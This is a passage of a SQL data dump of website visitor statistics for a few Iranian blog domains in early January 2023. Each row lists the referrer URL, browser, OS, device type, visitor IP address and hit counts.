(27429,'2023-01-05','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','223.240.99.104','000',0,1,0),
(27430,'2023-01-05','http://ictbank.ir/blog','Chrome','Windows','98.0.0.0','desktop','Unknown','','173.248.240.34','000',0,5,0),
(27431,'2023-01-05','http://ictbank.ir/blog','Chrome','Windows','97.0.0.0','desktop','Unknown','','185.119.81.108','000',0,2,0),
(27432,'2023-01-05','http://ictbank.ir/blog','Chrome','Windows','108.0.0.0','desktop','Unknown','','5.237.185.26','000',0,1,0),
(27433,'2023-01-05','http://45.92.94.221:80/blog','Firefox','Windows','83.0','desktop','Unknown','','5.23.55.47','000',0,4,0),
(27434,'2023-01-05','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,3,0),
(27435,'2023-01-05','http://ns1.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','193.118.55.162','000',0,2,0),
(27436,'2023-01-05','http://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','178.128.225.136','000',0,1,0),
(27437,'2023-01-05','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.11','000',0,2,0),
(27438,'2023-01-05','https://www.google.com/','Chrome','Windows','108.0.0.0','desktop','Unknown','','103.138.233.41','000',0,1,0),
(27439,'2023-01-05','http://45.92.94.221:80/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,2,0),
(27440,'2023-01-05','http://ictbank.ir/blog','Chrome','Windows','108.0.0.0','desktop','Unknown','','192.175.111.243','000',0,1,0),
(27441,'2023-01-05','http://ictbank.ir/blog','Chrome','Windows','108.0.0.0','desktop','Unknown','','192.175.111.241','000',0,1,0),
(27442,'2023-01-05','http://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(27443,'2023-01-05','http://ictbank.ir/blog','Chrome','OS X','18.0.0.0','desktop','Macintosh','','193.123.63.4','000',0,2,0),
(27444,'2023-01-05','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.225.103','000',0,4,0),
(27445,'2023-01-05','http://ictbank.ir/blog','Chrome','Windows','70.0.0.0','desktop','Unknown','','170.64.133.201','000',0,1,0),
(27446,'2023-01-05','http://mail.design-arena.ir/blog/wp-login.php','Chrome','OS X','70.0.0.0','desktop','Macintosh','','59.3.143.48','000',0,2,0),
(27447,'2023-01-05','http://ictbank.ir/blog','Firefox','Windows','9.0.0','desktop','Unknown','','5.196.193.1','000',0,2,0),
(27448,'2023-01-05','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','108.61.123.152','000',0,1,0),
(27449,'2023-01-05','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','45.76.131.138','000',0,1,0),
(27450,'2023-01-05','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','95.179.239.244','000',0,2,0),
(27451,'2023-01-05','https://www.google.com/','Chrome','Windows','108.0.0.0','desktop','Unknown','','128.59.230.13','000',0,1,0),
(27452,'2023-01-05','http://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','42.83.147.34','000',0,2,0),
(27453,'2023-01-05','http://ictbank.ir/blog','Firefox','Windows','77.0','desktop','Unknown','','94.183.164.163','000',0,1,0),
(27454,'2023-01-05','http://ictbank.ir/blog','Firefox','Windows','77.0','desktop','Unknown','','186.179.100.146','000',0,1,0),
(27455,'2023-01-05','http://ictbank.ir/blog','Firefox','Windows','77.0','desktop','Unknown','','177.101.246.150','000',0,1,0),
(27456,'2023-01-05','http://ictbank.ir/blog','Firefox','Windows','77.0','desktop','Unknown','','190.104.195.172','000',0,1,0),
(27457,'2023-01-05','http://baidu.com/','Chrome','Android','87.0.0.0','mobile:smart','Pixel 2','','42.236.10.75','000',0,1,0),
(27458,'2023-01-06','http://design-arena.ir/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.173','000',0,1,0),
(27459,'2023-01-06','http://ictbank.ir/blog','Firefox','OS X','68.0','desktop','Macintosh','','51.254.199.11','000',0,3,0),
(27460,'2023-01-06','http://ictbank.ir/blog/','Chrome','Windows','83.0.0.0','desktop','Unknown','','37.139.53.82','000',0,5,0),
(27461,'2023-01-06','http://ictbank.ir/blog/wp-login.php','Chrome','Windows','70.0.0.0','desktop','Unknown','','131.147.8.252','000',0,2,0),
(27462,'2023-01-06','http://45.92.94.221/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.35','000',0,1,0),
(27463,'2023-01-06','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,18,0),
(27464,'2023-01-06','http://ns2.design-arena.ir/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.88','000',0,1,0),
(27465,'2023-01-06','http://ictbank.ir/blog','Chrome','Windows','14.0.0.0','desktop','Unknown','','208.80.194.121','000',0,1,0),
(27466,'2023-01-06','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.136','000',0,2,0),
(27467,'2023-01-06','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','14.116.152.84','000',0,1,0),
(27468,'2023-01-06','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.44','000',0,2,0),
(27469,'2023-01-06','http://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(27470,'2023-01-06','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','45.33.102.90','000',0,2,0),
(27471,'2023-01-06','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,4,0),
(27472,'2023-01-06','http://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','185.119.81.108','000',0,8,0),
(27473,'2023-01-06','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','74.84.150.150','000',0,2,0),
(27474,'2023-01-06','https://www.google.com/','Firefox','Ubuntu','108.0','desktop','Unknown','','82.200.40.73','000',0,1,0),
(27475,'2023-01-06','http://ictbank.ir/blog','Firefox','Windows','86.0','desktop','Unknown','','83.166.244.113','000',0,1,0),
(27476,'2023-01-06','http://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','139.162.242.60','000',0,2,0),
(27477,'2023-01-06','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.92.158.23','000',0,1,0),
(27478,'2023-01-06','http://wikisonnati.com/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.141','000',0,1,0),
(27479,'2023-01-06','http://45.92.94.221:80/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,2,0),
(27480,'2023-01-06','http://ictbank.ir/blog','Firefox','Windows','5.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(27481,'2023-01-06','https://www.google.com.ua/','Chrome','Windows','108.0.0.0','desktop','Unknown','','85.238.102.56','000',0,1,0),
(27482,'2023-01-06','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','108.61.123.152','000',0,1,0),
(27483,'2023-01-06','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','78.141.244.3','000',0,1,0),
(27484,'2023-01-06','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','157.245.34.123','000',0,1,0),
(27485,'2023-01-06','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','178.62.98.236','000',0,1,0),
(27486,'2023-01-06','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','180.149.125.159','000',0,1,0),
(27487,'2023-01-06','http://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','54.217.178.104','000',0,1,0),
(27488,'2023-01-07','http://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(27489,'2023-01-07','http://ictbank.ir/blog','Firefox','Ubuntu','58.0','desktop','Unknown','','188.165.87.104','000',0,1,0),
(27490,'2023-01-07','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.210','000',0,2,0),
(27491,'2023-01-07','http://design-arena.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','209.126.77.66','000',0,2,0),
(27492,'2023-01-07','http://ictbank.ir/blog','Firefox','Ubuntu','58.0','desktop','Unknown','','188.165.87.100','000',0,1,0),
(27493,'2023-01-07','http://ictbank.ir/blog','Chrome','Windows','70.0.0.0','desktop','Unknown','','143.110.184.142','000',0,2,0),
(27494,'2023-01-07','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,2,0),
(27495,'2023-01-07','http://45.92.94.221:80/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,2,0),
(27496,'2023-01-07','http://ictbank.ir/blog/index.php/2020/02/02/rebuild-and-reorganize-all-indexes-within-a-database/','Chrome','Windows','90.0.0.0','desktop','Unknown','','37.139.53.40','000',0,8,0),
(27497,'2023-01-07','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,16,0),
(27498,'2023-01-07','http://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(27499,'2023-01-07','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','113.125.140.19','000',0,2,0),
(27500,'2023-01-07','http://ictbank.ir/blog','Chrome','OS X','36.0.0.0','desktop','Macintosh','','217.198.191.209','000',0,2,0),
(27501,'2023-01-07','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.134.134','000',0,2,0),
(27502,'2023-01-07','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.221.6.1','000',0,2,0),
(27503,'2023-01-07','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','18.237.121.58','000',0,1,0),
(27504,'2023-01-07','http://ictbank.ir/blog','Chrome','Android','55.0.0.0','mobile:smart','Nexus 5','','150.255.124.57','000',0,1,0),
(27505,'2023-01-07','http://ictbank.ir/blog','Chrome','Android','55.0.0.0','mobile:smart','Nexus 5','','110.177.178.80','000',0,1,0),
(27506,'2023-01-07','http://ictbank.ir/blog','Internet Explorer','Windows','5.0.0','desktop','Unknown','','221.212.178.184','000',0,1,0),
(27507,'2023-01-07','http://ictbank.ir/blog','Internet Explorer','Windows','5.0.0','desktop','Unknown','','119.60.104.145','000',0,1,0),
(27508,'2023-01-07','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','198.211.118.113','000',0,1,0),
(27509,'2023-01-07','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','140.82.52.24','000',0,1,0),
(27510,'2023-01-07','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','188.166.159.169','000',0,1,0),
(27511,'2023-01-07','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','178.62.98.236','000',0,1,0),
(27512,'2023-01-07','http://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(27513,'2023-01-07','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.26','000',0,2,0),
(27514,'2023-01-07','https://www.google.com/','Safari','OS X','14.0.0','desktop','Macintosh','','91.123.151.188','000',0,1,0),
(27515,'2023-01-07','http://ictbank.ir/blog','Chrome','OS X','107.0.0.0','desktop','Macintosh','','34.234.11.9','000',0,2,0),
(27516,'2023-01-07','http://ictbank.ir/blog','Chrome','Windows','68.0.0.0','desktop','Unknown','','185.119.81.108','000',0,2,0),
(27517,'2023-01-08','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,6,0),
(27518,'2023-01-08','http://ictbank.ir/blog','Firefox','Windows','9.0.0','desktop','Unknown','','5.188.82.110','000',0,2,0),
(27519,'2023-01-08','http://ictbank.ir/blog','Chrome','Windows','108.0.0.0','desktop','Unknown','','5.160.95.179','000',0,19,0),
(27520,'2023-01-08','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','59.36.163.204','000',0,2,0),
(27521,'2023-01-08','http://ictbank.ir/blog','Chrome','Android','104.0.0.0','tablet','Unknown','','5.211.201.198','000',0,1,0),
(27522,'2023-01-08','http://mail.ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','167.114.113.132','000',0,4,0),
(27523,'2023-01-08','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','67.20.117.134','000',0,1,0),
(27524,'2023-01-08','http://ictbank.ir/blog','Chrome','Windows','108.0.0.0','desktop','Unknown','','23.229.113.138','000',0,3,0),
(27525,'2023-01-08','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','23.251.102.74','000',0,2,0),
(27526,'2023-01-08','http://ictbank.ir/blog','Chrome','Windows','101.0.0.0','desktop','Unknown','','5.188.62.26','000',0,1,0),
(27527,'2023-01-08','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.190.193.165','000',0,2,0),
(27528,'2023-01-08','http://mail.nikoo-academy.com/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','20.189.76.117','000',0,4,0),
(27529,'2023-01-08','http://ictbank.ir/blog/wp-login.php','Firefox','Ubuntu','.0','desktop','Unknown','','221.147.63.67','000',0,2,0),
(27530,'2023-01-08','http://45.92.94.221/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','118.193.72.169','000',0,3,0),
(27531,'2023-01-08','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','18.236.143.146','000',0,1,0),
(27532,'2023-01-08','http://45.92.94.221/blog','Unknown','Android','Unknown','mobile:smart','Mate 30 Pro','','47.88.93.234','000',0,1,0),
(27533,'2023-01-08','http://45.92.94.221/blog/','Unknown','Android','Unknown','mobile:smart','Mate 30 Pro','','47.251.11.3','000',0,1,0),
(27534,'2023-01-08','http://ictbank.ir/blog','Chrome','Windows','41.0.0.0','desktop','Unknown','','66.240.236.119','000',0,2,0),
(27535,'2023-01-08','http://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','89.117.20.172','000',0,1,0),
(27536,'2023-01-08','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','198.211.124.61','000',0,1,0),
(27537,'2023-01-08','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','45.32.144.195','000',0,1,0),
(27538,'2023-01-08','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','95.179.239.244','000',0,1,0),
(27539,'2023-01-08','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','188.166.159.169','000',0,1,0),
(27540,'2023-01-08','http://mail.design-arena.ir/blog/wp-login.php','Safari','OS X','12.0.0','desktop','Macintosh','','103.16.199.166','000',0,2,0),
(27541,'2023-01-08','http://ictbank.ir/blog','Chrome','Windows','41.0.0.0','desktop','Unknown','','185.142.236.43','000',0,2,0),
(27542,'2023-01-08','http://45.92.94.221:80/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,2,0),
(27543,'2023-01-08','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.141.34','000',0,2,0),
(27544,'2023-01-08','http://ictbank.ir/blog/index.php/2020/02/02/change-the-character-set-collation-of-a-table/','Chrome','Windows','90.0.0.0','desktop','Unknown','','37.139.53.20','000',0,8,0),
(27545,'2023-01-08','http://45.92.94.221/blog','Chrome','Windows','107.0.0.0','desktop','Unknown','','34.237.253.179','000',0,2,0),
(27546,'2023-01-09','http://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,5,0),
(27547,'2023-01-09','http://45.92.94.221/blog','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.25','000',0,1,0),
(27548,'2023-01-09','http://45.92.94.221/blog/','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.196','000',0,1,0),
(27549,'2023-01-09','http://45.92.94.221/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.125','000',0,1,0),
(27550,'2023-01-09','http://ictbank.ir/blog','Chrome','Windows','101.0.0.0','desktop','Unknown','','5.188.62.21','000',0,1,0),
(27551,'2023-01-09','https://www.bing.com','Chrome','Windows','35.0.0.0','desktop','Unknown','','168.138.186.59','000',0,3,0),
(27552,'2023-01-09','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','14.116.184.240','000',0,2,0),
(27553,'2023-01-09','https://www.google.com/','Chrome','Linux','108.0.0.0','desktop','Unknown','','178.236.124.203','000',0,1,0),
(27554,'2023-01-09','https://www.bing.com','Chrome','Windows','41.0.0.0','desktop','Unknown','','134.122.123.193','000',0,1,0),
(27555,'2023-01-09','https://www.bing.com','Chrome','OS X','41.0.0.0','desktop','Macintosh','','137.184.59.77','000',0,1,0),
(27556,'2023-01-09','https://www.google.com/','Chrome','Android','108.0.0.0','mobile:smart','Unknown','','204.18.15.77','000',0,1,0),
(27557,'2023-01-09','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.134.134','000',0,2,0),
(27558,'2023-01-09','http://ictbank.ir/blog','Chrome','Windows','80.0.0.0','desktop','Unknown','','185.119.81.100','000',0,6,0),
(27559,'2023-01-09','https://www.ecosia.org/','Edge','Windows','108.0.0.0','desktop','Unknown','','103.83.211.154','000',0,6,0),
(27560,'2023-01-09','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.89.188.204','000',0,2,0),
(27561,'2023-01-09','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','74.84.150.150','000',0,1,0),
(27562,'2023-01-09','http://ictbank.ir/blog','Chrome','Windows','70.0.0.0','desktop','Unknown','','147.182.154.209','000',0,1,0),
(27563,'2023-01-09','http://mail.design-arena.ir/blog/wp-login.php','Chrome','Windows','70.0.0.0','desktop','Unknown','','125.198.46.170','000',0,2,0),
(27564,'2023-01-09','http://ictbank.ir','Chrome','Windows','58.0.0.0','desktop','Unknown','','94.23.31.9','000',0,1,0),
(27565,'2023-01-09','https://www.google.com/','Chrome','Windows','108.0.0.0','desktop','Unknown','','125.164.98.245','000',0,1,0),
(27566,'2023-01-09','http://45.92.94.221:80/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,4,0),
(27567,'2023-01-09','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.213.79.207','000',0,1,0),
(27568,'2023-01-09','http://ictbank.ir/blog/','Chrome','Windows','90.0.0.0','desktop','Unknown','','95.105.125.113','000',0,6,0),
(27569,'2023-01-09','http://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','134.209.216.90','000',0,2,0),
(27570,'2023-01-09','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,2,0),
(27571,'2023-01-09','http://ictbank.ir/blog','Edge','Windows','91.0.0.0','desktop','Unknown','','185.181.60.39','000',0,3,0),
(27572,'2023-01-09','http://ictbank.ir','Firefox','Windows','58.0','desktop','Unknown','','109.70.100.91','000',0,1,0),
(27573,'2023-01-09','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','198.199.124.59','000',0,1,0),
(27574,'2023-01-09','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','198.211.124.61','000',0,1,0),
(27575,'2023-01-09','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','178.128.165.136','000',0,1,0),
(27576,'2023-01-09','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','78.141.244.3','000',0,1,0),
(27577,'2023-01-09','http://ictbank.ir/blog','Firefox','Windows','73.0','desktop','Unknown','','193.33.132.200','000',0,1,0),
(27578,'2023-01-09','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','172.104.193.53','000',0,2,0),
(27579,'2023-01-10','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,2,0),
(27580,'2023-01-10','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','209.141.52.23','000',0,1,0),
(27581,'2023-01-10','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','185.129.62.62','000',0,1,0),
(27582,'2023-01-10','http://ns10.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.13','000',0,2,0),
(27583,'2023-01-10','http://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','50.31.21.7','000',0,2,0),
(27584,'2023-01-10','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.79','000',0,2,0),
(27585,'2023-01-10','http://ictbank.ir/blog','Chrome','Windows','32.0.0.0','desktop','Unknown','','54.217.178.104','000',0,1,0),
(27586,'2023-01-10','http://ictbank.ir/blog/wp-login.php','Chrome','OS X','70.0.0.0','desktop','Macintosh','','121.166.167.235','000',0,2,0),
(27587,'2023-01-10','http://ictbank.ir/blog','Chrome','Windows','108.0.0.0','desktop','Unknown','','175.195.137.157','000',0,1,0),
(27588,'2023-01-10','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','140.246.164.95','000',0,1,0),
(27589,'2023-01-10','http://ictbank.ir/blog','Chrome','Windows','65.0.0.0','desktop','Unknown','','200.4.142.32','000',0,2,0),
(27590,'2023-01-10','http://ictbank.ir/blog','Firefox','Ubuntu','3.0.0','desktop','Unknown','','208.80.194.121','000',0,1,0),
(27591,'2023-01-10','https://www.google.com/','Edge','Windows','108.0.0.0','desktop','Unknown','','138.185.136.88','000',0,1,0),
(27592,'2023-01-10','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.210','000',0,2,0),
(27593,'2023-01-10','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.46','000',0,2,0),
(27594,'2023-01-10','http://45.92.94.221:80/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,5,0),
(27595,'2023-01-10','http://ictbank.ir/blog','Chrome','Linux','12.0.0.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(27596,'2023-01-10','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.93.19.231','000',0,2,0),
(27597,'2023-01-10','http://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','134.209.216.90','000',0,2,0),
(27598,'2023-01-10','http://ictbank.ir/blog','Chrome','Windows','80.0.0.0','desktop','Unknown','','185.119.81.100','000',0,6,0),
(27599,'2023-01-10','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.11','000',0,2,0),
(27600,'2023-01-10','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','52.13.36.32','000',0,1,0),
(27601,'2023-01-10','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.71','000',0,2,0),
(27602,'2023-01-10','http://ictbank.ir','Chrome','Windows','58.0.0.0','desktop','Unknown','','212.92.58.16','000',0,1,0),
(27603,'2023-01-10','http://ictbank.ir/blog','Chrome','Windows','105.0.0.0','desktop','Unknown','','46.100.0.69','000',0,1,0),
(27604,'2023-01-10','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','95.179.239.244','000',0,1,0),
(27605,'2023-01-10','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','45.63.115.86','000',0,1,0),
(27606,'2023-01-10','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','45.76.131.138','000',0,1,0),
(27607,'2023-01-10','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','178.128.165.136','000',0,1,0),
(27608,'2023-01-10','http://ictbank.ir/blog','Firefox','Windows','5.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(27609,'2023-01-10','http://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','44.193.8.167','000',0,1,0),
(27610,'2023-01-10','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','92.205.12.81','000',0,1,0),
(27611,'2023-01-10','http://baidu.com/','Chrome','Android','87.0.0.0','mobile:smart','Pixel 2','','180.163.220.54','000',0,1,0),
(27612,'2023-01-10','http://baidu.com/','Chrome','Android','87.0.0.0','mobile:smart','Pixel 2','','180.163.220.5','000',0,1,0),
(27613,'2023-01-10','http://45.92.94.221/blog','Firefox','Linux','73.0','desktop','Unknown','','104.131.178.201','000',0,2,0),
(27614,'2023-01-11','http://wikisonnati.com/','Vivo Browser','Android','8.0.0.0','mobile:smart','Unknown','','152.32.169.199','000',0,2,0),
(27615,'2023-01-11','http://ictbank.ir/blog','Safari','OS X','15.0','desktop','Macintosh','','52.173.24.78','000',0,1,0),
(27616,'2023-01-11','http://ictbank.ir/blog','Safari','OS X','15.0','desktop','Macintosh','','13.89.202.215','000',0,2,0),
(27617,'2023-01-11','http://ictbank.ir/blog','Safari','OS X','15.0','desktop','Macintosh','','52.165.168.114','000',0,1,0),
(27618,'2023-01-11','http://ictbank.ir/blog','Safari','OS X','15.0','desktop','Macintosh','','40.69.133.53','000',0,1,0),
(27619,'2023-01-11','http://ictbank.ir/blog','Safari','OS X','15.0','desktop','Macintosh','','40.122.189.247','000',0,1,0),
(27620,'2023-01-11','http://ictbank.ir/blog','Safari','OS X','15.0','desktop','Macintosh','','40.122.237.244','000',0,2,0),
(27621,'2023-01-11','http://ictbank.ir/blog','Safari','OS X','15.0','desktop','Macintosh','','52.165.221.50','000',0,1,0),
(27622,'2023-01-11','http://ictbank.ir/blog','Safari','OS X','15.0','desktop','Macintosh','','40.122.201.246','000',0,1,0),
(27623,'2023-01-11','http://ictbank.ir/blog','Safari','OS X','15.0','desktop','Macintosh','','40.77.81.23','000',0,1,0),
(27624,'2023-01-11','http://ictbank.ir/blog','Safari','OS X','15.0','desktop','Macintosh','','104.208.38.72','000',0,1,0),
(27625,'2023-01-11','http://ictbank.ir/blog','Safari','OS X','15.0','desktop','Macintosh','','40.83.54.30','000',0,1,0),
(27626,'2023-01-11','http://ictbank.ir/blog','Safari','OS X','15.0','desktop','Macintosh','','40.86.101.126','000',0,1,0),
(27627,'2023-01-11','http://ictbank.ir/blog','Safari','OS X','15.0','desktop','Macintosh','','13.89.129.121','000',0,1,0),
(27628,'2023-01-11','http://ictbank.ir/blog','Safari','OS X','15.0','desktop','Macintosh','','13.89.226.99','000',0,1,0),
(27629,'2023-01-11','http://ictbank.ir/blog','Safari','OS X','15.0','desktop','Macintosh','','40.122.54.173','000',0,1,0),
(27630,'2023-01-11','http://ictbank.ir/blog','Safari','OS X','15.0','desktop','Macintosh','','40.83.49.2','000',0,1,0),
(27631,'2023-01-11','http://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(27632,'2023-01-11','http://ns11.design-arena.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.34.187','000',0,1,0),
(27633,'2023-01-11','http://www.design-arena.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.55.120','000',0,3,0),
(27634,'2023-01-11','http://45.92.94.221/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','205.185.122.184','000',0,1,0),
(27635,'2023-01-11','http://mail.design-arena.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','205.185.116.25','000',0,1,0),
(27636,'2023-01-11','http://ictbank.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','205.185.121.69','000',0,1,0),
(27637,'2023-01-11','http://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.121','000',0,1,0),
(27638,'2023-01-11','http://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','134.209.216.90','000',0,1,0),
(27639,'2023-01-11','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.72','000',0,2,0),
(27640,'2023-01-11','http://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,4,0),
(27641,'2023-01-11','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','14.116.157.23','000',0,1,0),
(27642,'2023-01-11','http://ictbank.ir/blog','Chrome','Windows','108.0.0.0','desktop','Unknown','','5.160.95.179','000',0,4,0),
(27643,'2023-01-11','http://ns10.design-arena.ir/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.184','000',0,1,0),
(27644,'2023-01-11','http://ictbank.ir/blog','Chrome','Windows','12.0.0.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(27645,'2023-01-11','http://ictbank.ir/blog','Chrome','OS X','107.0.0.0','desktop','Macintosh','','54.152.83.207','000',0,4,0),
